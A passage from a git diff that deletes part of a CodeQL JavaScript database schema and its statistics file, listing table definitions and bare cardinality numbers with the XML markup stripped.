@json_array -| 5 = @json_object; - -@json_parent = @json_object | @json_array | @file; - -@json_locatable = @json_value | @json_parse_error; - -// locations -@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; - -@locatable = @file - | @ast_node - | @comment - | @line - | @js_parse_error | @regexp_parse_error - | @regexpterm - | @json_locatable - | @token - | @cfg_node - | @jsdoc | @jsdoc_type_expr | @jsdoc_tag - | @yaml_locatable - | @xmllocatable - | @configLocatable - | @template_placeholder_tag; - -hasLocation (unique int locatable: @locatable ref, - int location: @location ref); - -// CFG -entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); -exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); -guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); -case @guard_node.kind of - 0 = @falsy_guard -| 1 = @truthy_guard; -@condition_guard = @falsy_guard | @truthy_guard; - -@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; -@cfg_node = @synthetic_cfg_node | @expr_parent; - -successor (int pred: @cfg_node ref, int succ: @cfg_node ref); - -// JSDoc comments -jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); -#keyset[parent, idx] -jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, - int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); -jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); -jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); - -#keyset[parent, idx] -jsdoc_type_exprs (unique int id: @jsdoc_type_expr, - int kind: int ref, - int parent: @jsdoc_type_expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); -case @jsdoc_type_expr.kind of - 0 = @jsdoc_any_type_expr -| 1 = @jsdoc_null_type_expr -| 2 = @jsdoc_undefined_type_expr -| 3 = @jsdoc_unknown_type_expr -| 4 = @jsdoc_void_type_expr -| 5 
= @jsdoc_named_type_expr -| 6 = @jsdoc_applied_type_expr -| 7 = @jsdoc_nullable_type_expr -| 8 = @jsdoc_non_nullable_type_expr -| 9 = @jsdoc_record_type_expr -| 10 = @jsdoc_array_type_expr -| 11 = @jsdoc_union_type_expr -| 12 = @jsdoc_function_type_expr -| 13 = @jsdoc_optional_type_expr -| 14 = @jsdoc_rest_type_expr -; - -#keyset[id, idx] -jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); -jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); -jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); - -@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; - -jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); - -@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; - -@optionalchainable = @call_expr | @propaccess; - -isOptionalChaining(int id: @optionalchainable ref); - -/** - * The time taken for the extraction of a file. - * This table contains non-deterministic content. - * - * The sum of the `time` column for each (`file`, `timerKind`) pair - * is the total time taken for extraction of `file`. The `extractionPhase` - * column provides a granular view of the extraction time of the file. - */ -extraction_time( - int file : @file ref, - // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. - int extractionPhase: int ref, - // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds - int timerKind: int ref, - float time: float ref -) - -/** -* Non-timing related data for the extraction of a single file. -* This table contains non-deterministic content. 
-*/ -extraction_data( - int file : @file ref, - // the absolute path to the cache file - varchar(900) cacheFile: string ref, - boolean fromCache: boolean ref, - int length: int ref -) - -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- XML Files -*/ - -xmlEncoding( - unique int id: @file ref, - string encoding: string ref -); - -xmlDTDs( - unique int id: @xmldtd, - string root: string ref, - string publicId: string ref, - string systemId: string ref, - int fileid: @file ref -); - -xmlElements( - unique int id: @xmlelement, - string name: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int fileid: @file ref -); - -xmlAttrs( - unique int id: @xmlattribute, - int elementid: @xmlelement ref, - string name: string ref, - string value: string ref, - int idx: int ref, - int fileid: @file ref -); - -xmlNs( - int id: @xmlnamespace, - string prefixName: string ref, - string URI: string ref, - int fileid: @file ref -); - -xmlHasNs( - int elementId: @xmlnamespaceable ref, - int nsId: @xmlnamespace ref, - int fileid: @file ref -); - -xmlComments( - unique int 
id: @xmlcomment, - string text: string ref, - int parentid: @xmlparent ref, - int fileid: @file ref -); - -xmlChars( - unique int id: @xmlcharacters, - string text: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int isCDATA: int ref, - int fileid: @file ref -); - -@xmlparent = @file | @xmlelement; -@xmlnamespaceable = @xmlelement | @xmlattribute; - -xmllocations( - int xmlElement: @xmllocatable ref, - int location: @location_default ref -); - -@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; - -/*- Configuration files with key value pairs -*/ - -configs( - unique int id: @config -); - -configNames( - unique int id: @configName, - int config: @config ref, - string name: string ref -); - -configValues( - unique int id: @configValue, - int config: @config ref, - string value: string ref -); - -configLocations( - int locatable: @configLocatable ref, - int location: @location_default ref -); - -@configLocatable = @config | @configName | @configValue; diff --git a/ql/lib/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats deleted file mode 100644 index 97ba6f9bcc3..00000000000 --- a/ql/lib/semmlecode.javascript.dbscheme.stats +++ /dev/null 
@@ -1,28248 +0,0 @@ - - - - -@location_default -15664049 - - -@file -6457 - - -@folder -1590 - - -@externalDataElement -950 - - -@toplevel -5320 - - -@script -5200 - - -@inline_script -86 - - -@event_handler -31 - - -@javascript_url -3 - - -@template_toplevel -100 - - -@stmt -1096691 - - -@empty_stmt -1136 - - -@block_stmt -204994 - - -@expr_stmt -610340 - - -@if_stmt -68214 - - -@labeled_stmt -1378 - - -@break_stmt -10149 - - -@continue_stmt -1642 - - -@with_stmt -4 - - -@switch_stmt -1569 - - -@return_stmt -48209 - - -@throw_stmt -2305 - - -@try_stmt -1316 - - -@while_stmt -3120 - - -@do_while_stmt -1471 - - -@for_stmt -5385 - - -@for_in_stmt -1315 - - -@debugger_stmt -3 - - -@function_decl_stmt -16771 - - -@var_decl_stmt -105606 - - -@case -8674 - - -@catch_clause -1272 - - -@for_of_stmt -61 - - -@const_decl_stmt -1118 - - -@let_stmt -551 - - -@legacy_let_stmt -1 - - -@for_each_stmt -1 - - -@class_decl_stmt -41 - - -@import_declaration -8 - - -@export_all_declaration -1 - - -@export_as_namespace_declaration -5 - - -@global_augmentation_declaration -5 - - -@using_decl_stmt -5 - - -@export_default_declaration -5 - - -@export_named_declaration -31 - - -@expr -5495305 - - -@label -722373 - - -@null_literal -15525 - - -@boolean_literal -31652 - - -@number_literal -557620 - - -@string_literal -268843 - - -@regexp_literal -2773 - - -@this_expr -128651 - - -@array_expr -28131 - - -@obj_expr -50958 - - -@function_expr -95744 - - -@seq_expr -2457 - - -@conditional_expr -8111 - - -@new_expr -19023 - - -@call_expr -487075 - - -@dot_expr -602582 - - -@index_expr -105192 - - -@neg_expr -11993 - - -@plus_expr -731 - - -@log_not_expr -19385 - - -@bit_not_expr -403 - - -@typeof_expr -4540 - - -@void_expr -51 - - -@delete_expr -1310 - - -@eq_expr -13468 - - -@neq_expr -5338 - - -@eqq_expr -17758 - - -@neqq_expr -5818 - - -@lt_expr -10254 - - -@le_expr -1503 - - -@gt_expr -5438 - - -@ge_expr -2527 - - -@lshift_expr -5655 - - -@rshift_expr -27749 - - -@urshift_expr -4331 - - 
-@add_expr -88032 - - -@sub_expr -10789 - - -@mul_expr -14075 - - -@div_expr -2496 - - -@mod_expr -655 - - -@bitor_expr -42853 - - -@xor_expr -503 - - -@bitand_expr -8538 - - -@in_expr -1135 - - -@instanceof_expr -1184 - - -@logand_expr -15892 - - -@logor_expr -12711 - - -@assign_expr -245084 - - -@assign_add_expr -6231 - - -@assign_sub_expr -823 - - -@assign_mul_expr -143 - - -@assign_div_expr -44 - - -@assign_mod_expr -17 - - -@assign_lshift_expr -57 - - -@assign_rshift_expr -86 - - -@assign_urshift_expr -96 - - -@assign_or_expr -586 - - -@assign_xor_expr -108 - - -@assign_and_expr -222 - - -@assignlogandexpr -1 - - -@assignlogorexpr -1 - - -@assignnullishcoalescingexpr -1 - - -@template_placeholder_tag -100 - - -@template_pipe_ref -100 - - -@generated_code_expr -100 - - -@satisfies_expr -100 - - -@preinc_expr -1792 - - -@postinc_expr -7103 - - -@predec_expr -457 - - -@postdec_expr -774 - - -@par_expr -86199 - - -@var_declarator -130843 - - -@arrow_function_expr -3730 - - -@spread_element -50 - - -@array_pattern -57 - - -@object_pattern -122 - - -@yield_expr -81 - - -@tagged_template_expr -27 - - -@template_literal -408 - - -@template_literal_typeexpr -100 - - -@template_element -639 - - -@array_comprehension_expr -3 - - -@generator_expr -1 - - -@for_in_comprehension_block -1 - - -@for_of_comprehension_block -3 - - -@legacy_letexpr -1 - - -@var_decl -250257 - - -@proper_varaccess -1295408 - - -@super_expr -11 - - -@newtarget_expr -1 - - -@import_meta_expr -1 - - -@named_import_specifier -4 - - -@import_default_specifier -4 - - -@import_namespace_specifier -2 - - -@named_export_specifier -5 - - -@export_default_specifier -5 - - -@export_namespace_specifier -5 - - -@export_assign_declaration -5 - - -@interface_declaration -5 - - -@type_alias_declaration -120 - - -@enum_declaration -252 - - -@external_module_declaration -100 - - -@external_module_reference -5 - - -@expression_with_type_arguments -45 - - -@prefix_type_assertion -1721 - - -@as_type_assertion -368 - - 
-@export_varaccess -15 - - -@decorator_list -2575 - - -@non_null_assertion -2159 - - -@dynamic_import -5 - - -@import_equals_declaration -5 - - -@namespace_declaration -5 - - -@namespace_scope -5 - - -@exp_expr -14075 - - -@assign_exp_expr -143 - - -@class_expr -41 - - -@scope -118172 - - -@global_scope -1 - - -@function_scope -116245 - - -@catch_scope -1272 - - -@module_scope -21 - - -@block_scope -584 - - -@for_scope -17 - - -@for_in_scope -28 - - -@comprehension_block_scope -4 - - -@class_expr_scope -41 - - -@class_decl_scope -2693 - - -@interface_scope -200 - - -@type_alias_scope -11 - - -@enum_scope -252 - - -@external_module_scope -100 - - -@mapped_type_scope -10 - - -@conditional_type_scope -100 - - -@variable -364388 - - -@local_type_name -23565 - - -@local_namespace_name -20832 - - -@property -142723 - - -@value_property -140856 - - -@property_getter -1529 - - -@property_setter -338 - - -@jsx_attribute -100 - - -@function_call_signature -2458 - - -@constructor_call_signature -37 - - -@index_signature -504 - - -@enum_member -2026 - - -@proper_field -16934 - - -@parameter_field -2693 - - -@static_initializer -100 - - -@local_type_access -25491 - - -@type_decl -2513 - - -@keyword_typeexpr -25306 - - -@string_literal_typeexpr -733 - - -@number_literal_typeexpr -3 - - -@boolean_literal_typeexpr -4 - - -@array_typeexpr -4579 - - -@union_typeexpr -852 - - -@intersection_typeexpr -27 - - -@parenthesized_typeexpr -62 - - -@tuple_typeexpr -98 - - -@keyof_typeexpr -3 - - -@indexed_access_typeexpr -3 - - -@qualified_type_access -3559 - - -@import_namespace_access -100 - - -@import_type_access -100 - - -@import_var_type_access -100 - - -@optional_typeexpr -100 - - -@rest_typeexpr -100 - - -@readonly_typeexpr -100 - - -@bigint_literal_typeexpr -100 - - -@generic_typeexpr -5220 - - -@type_label -3559 - - -@typeof_typeexpr -24 - - -@local_var_type_access -24 - - -@qualified_var_type_access -15 - - -@this_var_type_access -20 - - -@predicate_typeexpr -86 - - 
-@interface_typeexpr -1038 - - -@type_parameter -3463 - - -@plain_function_typeexpr -1674 - - -@local_namespace_access -4671 - - -@qualified_namespace_access -20 - - -@constructor_typeexpr -20 - - -@mapped_typeexpr -20 - - -@conditional_typeexpr -100 - - -@infer_typeexpr -100 - - -@comment -104947 - - -@any_type -1 - - -@string_type -1 - - -@number_type -1 - - -@union_type -1802 - - -@true_type -1 - - -@false_type -1 - - -@type_reference -12383 - - -@object_type -159099 - - -@canonical_type_variable_type -650 - - -@typeof_type -2903 - - -@void_type -1 - - -@undefined_type -1 - - -@null_type -1 - - -@never_type -1 - - -@plain_symbol_type -1 - - -@objectkeyword_type -1 - - -@intersection_type -369 - - -@tuple_type -307 - - -@lexical_type_variable_type -50 - - -@this_type -2731 - - -@number_literal_type -1244 - - -@string_literal_type -30638 - - -@unknown_type -100 - - -@bigint_type -100 - - -@bigint_literal_type -100 - - -@unique_symbol_type -100 - - -@root_symbol -2385 - - -@member_symbol -7223 - - -@other_symbol -584 - - -@function_signature_type -34698 - - -@constructor_signature_type -2646 - - -@slashslash_comment -76841 - - -@slashstar_comment -8834 - - -@doc_comment -19270 - - -@html_comment_start -1 - - -@htmlcommentend -1 - - -@line -1622184 - - -@js_parse_error -8 - - -@regexpterm -33197 - - -@regexp_alt -641 - - -@regexp_seq -3371 - - -@regexp_caret -826 - - -@regexp_dollar -637 - - -@regexp_wordboundary -99 - - -@regexp_nonwordboundary -3 - - -@regexp_positive_lookahead -15 - - -@regexp_negative_lookahead -12 - - -@regexp_star -1057 - - -@regexp_plus -1067 - - -@regexp_opt -478 - - -@regexp_range -146 - - -@regexp_dot -445 - - -@regexp_group -1692 - - -@regexp_normal_constant -15489 - - -@regexp_hex_escape -59 - - -@regexp_unicode_escape -264 - - -@regexp_dec_escape -7 - - -@regexp_oct_escape -1 - - -@regexp_ctrl_escape -599 - - -@regexp_char_class_escape -1573 - - -@regexp_id_escape -2613 - - -@regexp_backref -11 - - -@regexp_char_class -1473 - - 
-@regexp_char_range -619 - - -@regexp_positive_lookbehind -15 - - -@regexp_negative_lookbehind -12 - - -@regexp_unicode_property_escape -12 - - -@regexp_parse_error -122 - - -@token -8770869 - - -@token_eof -5312 - - -@token_null_literal -15526 - - -@token_boolean_literal -31654 - - -@token_numeric_literal -557620 - - -@token_string_literal -269555 - - -@token_regular_expression -2773 - - -@token_identifier -2268328 - - -@token_keyword -551767 - - -@token_punctuator -5068334 - - -@json_value -1643352 - - -@json_null -24 - - -@json_boolean -654 - - -@json_number -273113 - - -@json_string -752355 - - -@json_array -175925 - - -@json_object -441281 - - -@json_parse_error -1 - - -@entry_node -121542 - - -@exit_node -121542 - - -@guard_node -177785 - - -@jsdoc -19270 - - -@falsy_guard -86336 - - -@truthy_guard -91449 - - -@jsdoc_tag -29323 - - -@jsdoc_type_expr -22481 - - -@jsdoc_any_type_expr -292 - - -@jsdoc_null_type_expr -35 - - -@jsdoc_undefined_type_expr -287 - - -@jsdoc_unknown_type_expr -27 - - -@jsdoc_void_type_expr -8 - - -@jsdoc_named_type_expr -18639 - - -@jsdoc_applied_type_expr -303 - - -@jsdoc_nullable_type_expr -310 - - -@jsdoc_non_nullable_type_expr -536 - - -@jsdoc_record_type_expr -91 - - -@jsdoc_array_type_expr -19 - - -@jsdoc_union_type_expr -668 - - -@jsdoc_function_type_expr -316 - - -@jsdoc_optional_type_expr -895 - - -@jsdoc_rest_type_expr -55 - - -@jsdoc_error -1658 - - -@yaml_node -885 - - -@yaml_scalar_node -700 - - -@yaml_mapping_node -149 - - -@yaml_sequence_node -35 - - -@yaml_alias_node -1 - - -@yaml_error -1 - - -@jsx_element -1090 - - -@jsx_qualified_name -100 - - -@jsx_empty_expr -100 - - -@await_expr -100 - - -@function_sent_expr -100 - - -@decorator -100 - - -@bind_expr -100 - - -@bigint_literal -100 - - -@nullishcoalescing_expr -100 - - -@e4x_xml_anyname -100 - - -@e4x_xml_static_attribute_selector -100 - - -@e4x_xml_dynamic_attribute_selector -100 - - -@e4x_xml_filter_expression -100 - - -@e4x_xml_static_qualident -100 - - 
-@e4x_xml_dynamic_qualident -100 - - -@e4x_xml_dotdotexpr -100 - - -@xmldtd -1 - - -@xmlelement -1270313 - - -@xmlattribute -1202020 - - -@xmlnamespace -4185 - - -@xmlcomment -26812 - - -@xmlcharacters -439958 - - -@optionalchainable -100 - - -@nullishcoalescing_expr -100 - - -@config -69795 - - -@configName -69794 - - -@configValue -69691 - - - - - -locations_default -id -15664049 - - -id -15664049 - - -file -6457 - - -beginLine -277405 - - -beginColumn -117878 - - -endLine -277405 - - -endColumn -117868 - - - - -id -file - - -12 - - -1 -2 -15664049 - - - - - - -id -beginLine - - -12 - - -1 -2 -15664049 - - - - - - -id -beginColumn - - -12 - - -1 -2 -15664049 - - - - - - -id -endLine - - -12 - - -1 -2 -15664049 - - - - - - -id -endColumn - - -12 - - -1 -2 -15664049 - - - - - - -file -id - - -12 - - -1 -2 -674 - - -2 -28 -501 - - -28 -105 -488 - - -105 -211 -488 - - -211 -335 -490 - - -335 -477 -485 - - -477 -637 -488 - - -637 -856 -486 - - -856 -1141 -485 - - -1141 -1602 -485 - - -1604 -2336 -486 - - -2336 -4472 -485 - - -4472 -2368854 -416 - - - - - - -file -beginLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -513 - - -23 -35 -516 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -beginColumn - - -12 - - -1 -2 -674 - - -2 -12 -491 - - -12 -32 -495 - - -32 -46 -510 - - -46 -56 -498 - - -56 -62 -488 - - -62 -67 -500 - - -67 -71 -477 - - -71 -75 -583 - - -75 -78 -497 - - -78 -80 -403 - - -80 -82 -543 - - -82 -117856 -298 - - - - - - -file -endLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -509 - - -23 -35 -520 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -endColumn - - -12 - - -1 -2 -682 - - -2 -18 -501 - - -18 -36 -487 - - -36 -51 -513 - - -51 -61 -532 - - -61 -67 -508 - - -67 
-72 -568 - - -72 -75 -444 - - -75 -78 -514 - - -78 -80 -484 - - -80 -81 -283 - - -81 -82 -579 - - -82 -117837 -362 - - - - - - -beginLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -19181 - - -14 -15 -29298 - - -15 -19 -25329 - - -19 -24 -17273 - - -24 -29 -22410 - - -29 -56 -21150 - - -56 -242 -20830 - - -242 -134468 -4769 - - - - - - -beginLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21079 - - -8 -6458 -17548 - - - - - - -beginLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19126 - - -11 -12 -32612 - - -12 -15 -18313 - - -15 -17 -18964 - - -17 -21 -21845 - - -21 -31 -21197 - - -31 -64 -20988 - - -64 -94454 -7194 - - - - - - -beginLine -endLine - - -12 - - -1 -2 -238980 - - -2 -3 -22312 - - -3 -890 -16113 - - - - - - -beginLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -20939 - - -12 -13 -28687 - - -13 -16 -19707 - - -16 -18 -20057 - - -18 -22 -21035 - - -22 -33 -21605 - - -33 -69 -21089 - - -69 -94455 -7120 - - - - - - -beginColumn -id - - -12 - - -1 -2 -5117 - - -2 -3 -9246 - - -3 -4 -13440 - - -4 -5 -15857 - - -5 -6 -13813 - - -6 -7 -11696 - - -7 -8 -8777 - - -8 -9 -6887 - - -9 -11 -9723 - - -11 -14 -10392 - - -14 -20 -9364 - - -20 -2248970 -3566 - - - - - - -beginColumn -file - - -12 - - -1 -2 -68610 - - -2 -3 -15842 - - -3 -4 -7965 - - -4 -5 -9221 - - -5 -6 -8014 - - -6 -6458 -8226 - - - - - - -beginColumn -beginLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10178 - - -6 -7 -6239 - - -7 -9 -10825 - - -9 -11 -9294 - - -11 -1255 -8841 - - -1258 -277405 -205 - - - - - - -beginColumn -endLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10175 - - -6 -7 -6232 - - -7 -9 -10827 - - -9 -11 -9299 - - -11 -1227 -8842 - - -1256 -277405 -207 - - - - - - -beginColumn -endColumn - - -12 - - -1 -2 -24039 - - -2 -3 -21662 - - -3 -4 -22809 - - -4 -5 -17118 - - -5 -6 -12038 - - -6 -7 -7768 - - -7 -10 -9297 - - -10 
-1064 -3147 - - - - - - -endLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -18715 - - -14 -15 -30262 - - -15 -19 -24946 - - -19 -24 -17066 - - -24 -29 -22451 - - -29 -56 -21060 - - -56 -237 -20821 - - -237 -134470 -4919 - - - - - - -endLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21076 - - -8 -6458 -17551 - - - - - - -endLine -beginLine - - -12 - - -1 -2 -243883 - - -2 -4 -23431 - - -4 -71 -10091 - - - - - - -endLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19057 - - -11 -12 -32046 - - -12 -15 -18779 - - -15 -17 -18710 - - -17 -21 -21785 - - -21 -31 -21103 - - -31 -63 -20930 - - -63 -94454 -7829 - - - - - - -endLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -21177 - - -12 -13 -28718 - - -13 -16 -19585 - - -16 -18 -21210 - - -18 -23 -23344 - - -23 -35 -21013 - - -35 -80 -20938 - - -80 -94454 -4254 - - - - - - -endColumn -id - - -12 - - -1 -2 -4439 - - -2 -3 -8489 - - -3 -4 -12884 - - -4 -5 -16048 - - -5 -6 -15554 - - -6 -7 -12546 - - -7 -8 -9231 - - -8 -9 -6405 - - -9 -11 -9266 - - -11 -14 -10367 - - -14 -20 -9186 - - -20 -489713 -3453 - - - - - - -endColumn -file - - -12 - - -1 -2 -68569 - - -2 -3 -15919 - - -3 -4 -7876 - - -4 -5 -9221 - - -5 -6 -8062 - - -6 -6458 -8221 - - - - - - -endColumn -beginLine - - -12 - - -1 -2 -6848 - - -2 -3 -15273 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10857 - - -9 -11 -9251 - - -11 -1768 -8841 - - -1780 -212575 -199 - - - - - - -endColumn -beginColumn - - -12 - - -1 -2 -15842 - - -2 -3 -27460 - - -3 -4 -26707 - - -4 -5 -18639 - - -5 -6 -11518 - - -6 -8 -10766 - - -8 -265 -6936 - - - - - - -endColumn -endLine - - -12 - - -1 -2 -6850 - - -2 -3 -15271 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10858 - - -9 -11 -9252 - - -11 -1789 -8841 - - -1795 -212360 -197 - - - - - - - - -numlines -122044 - - -element_id -122044 - - -num_lines -1136 - - -num_code -939 - - -num_comment -418 - - - - 
-element_id -num_lines - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_code - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_comment - - -12 - - -1 -2 -122044 - - - - - - -num_lines -element_id - - -12 - - -1 -2 -399 - - -2 -3 -144 - - -3 -4 -97 - - -4 -6 -91 - - -6 -9 -86 - - -9 -15 -90 - - -15 -36 -86 - - -36 -174 -86 - - -175 -21589 -57 - - - - - - -num_lines -num_code - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -95 - - -4 -6 -87 - - -6 -9 -85 - - -9 -14 -88 - - -14 -24 -90 - - -24 -33 -89 - - -33 -38 -18 - - - - - - -num_lines -num_comment - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -94 - - -4 -6 -92 - - -6 -9 -90 - - -9 -14 -90 - - -14 -20 -89 - - -20 -27 -89 - - -27 -30 -8 - - - - - - -num_code -element_id - - -12 - - -1 -2 -317 - - -2 -3 -125 - - -3 -4 -67 - - -4 -5 -61 - - -5 -8 -67 - - -8 -12 -73 - - -12 -26 -72 - - -26 -69 -71 - - -69 -1540 -71 - - -1747 -22000 -15 - - - - - - -num_code -num_lines - - -12 - - -1 -2 -349 - - -2 -3 -118 - - -3 -4 -77 - - -4 -6 -76 - - -6 -10 -84 - - -10 -19 -78 - - -19 -31 -79 - - -31 -44 -73 - - -44 -52 -5 - - - - - - -num_code -num_comment - - -12 - - -1 -2 -347 - - -2 -3 -121 - - -3 -4 -79 - - -4 -6 -74 - - -6 -9 -74 - - -9 -16 -80 - - -16 -23 -72 - - -23 -31 -76 - - -31 -40 -16 - - - - - - -num_comment -element_id - - -12 - - -1 -2 -147 - - -2 -3 -67 - - -3 -4 -26 - - -4 -5 -26 - - -5 -7 -32 - - -7 -12 -34 - - -12 -32 -34 - - -33 -135 -32 - - -150 -93795 -20 - - - - - - -num_comment -num_lines - - -12 - - -1 -2 -171 - - -2 -3 -57 - - -3 -4 -32 - - -4 -5 -24 - - -5 -8 -33 - - -8 -18 -35 - - -19 -47 -32 - - -52 -253 -33 - - -362 -363 -1 - - - - - - -num_comment -num_code - - -12 - - -1 -2 -174 - - -2 -3 -54 - - -3 -4 -33 - - -4 -5 -22 - - -5 -8 -33 - - -8 -18 -36 - - -19 -47 -32 - - -51 -230 -32 - - -232 -346 -2 - - - - - - - - -files -id -6457 - - -id -6457 - - -name -6457 - - - - -id -name - - -12 - - -1 -2 -6457 - - - - - - -name -id - - -12 - - -1 -2 -6457 - - - - - - - - -folders -id -1590 - - 
-id -1590 - - -name -1590 - - - - -id -name - - -12 - - -1 -2 -1590 - - - - - - -name -id - - -12 - - -1 -2 -1590 - - - - - - - - -containerparent -child -8046 - - -parent -1590 - - -child -8046 - - - - -parent -child - - -12 - - -1 -2 -525 - - -2 -3 -326 - - -3 -4 -207 - - -4 -5 -128 - - -5 -7 -138 - - -7 -11 -132 - - -11 -53 -120 - - -60 -335 -14 - - - - - - -child -parent - - -12 - - -1 -2 -8046 - - - - - - - - -externalData -5684 - - -id -950 - - -path -3 - - -column -6 - - -value -790 - - - - -id -path - - -12 - - -1 -2 -950 - - - - - - -id -column - - -12 - - -2 -3 -4 - - -6 -7 -946 - - - - - - -id -value - - -12 - - -2 -6 -8 - - -6 -7 -942 - - - - - - -path -id - - -12 - - -4 -5 -1 - - -72 -73 -1 - - -874 -875 -1 - - - - - - -path -column - - -12 - - -2 -3 -1 - - -6 -7 -2 - - - - - - -path -value - - -12 - - -8 -9 -1 - - -86 -87 -1 - - -722 -723 -1 - - - - - - -column -id - - -12 - - -946 -947 -4 - - -950 -951 -2 - - - - - - -column -path - - -12 - - -2 -3 -4 - - -3 -4 -2 - - - - - - -column -value - - -12 - - -2 -3 -1 - - -6 -7 -1 - - -31 -32 -1 - - -93 -94 -1 - - -117 -118 -1 - - -620 -621 -1 - - - - - - -value -id - - -12 - - -1 -2 -478 - - -2 -3 -132 - - -3 -5 -69 - - -5 -16 -61 - - -16 -928 -50 - - - - - - -value -path - - -12 - - -1 -2 -764 - - -2 -3 -26 - - - - - - -value -column - - -12 - - -1 -2 -711 - - -2 -3 -79 - - - - - - - - -sourceLocationPrefix -1 - - -prefix -1 - - - - - -toplevels -id -5320 - - -id -5320 - - -kind -4 - - - - -id -kind - - -12 - - -1 -2 -5320 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -31 -32 -1 - - -86 -87 -1 - - -5200 -5201 -1 - - - - - - - - -is_externs -44 - - -toplevel -44 - - - - - -is_instantiated -5 - - -decl -5 - - - - - -has_declare_keyword -66 - - -stmt -66 - - - - - -has_asserts_keyword -66 - - -node -66 - - - - - -is_abstract_member -66 - - -id -66 - - - - - -has_public_keyword -9297 - - -id -9297 - - - - - -has_private_keyword -11391 - - -id -11391 - - - - - -has_protected_keyword -1048 - - -id -1048 - - - 
- - -has_readonly_keyword -2338 - - -id -2338 - - - - - -has_type_keyword -1000 - - -id -1000 - - - - - -is_optional_member -3668 - - -id -3668 - - - - - -has_definite_assignment_assertion -100 - - -id -100 - - - - - -is_optional_parameter_declaration -3966 - - -parameter -3966 - - - - - -parameter_fields -2693 - - -field -2693 - - -constructor -1020 - - -param_index -20 - - - - -field -constructor - - -12 - - -1 -2 -2693 - - - - - - -field -param_index - - -12 - - -1 -2 -2693 - - - - - - -constructor -field - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -constructor -param_index - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -param_index -field - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 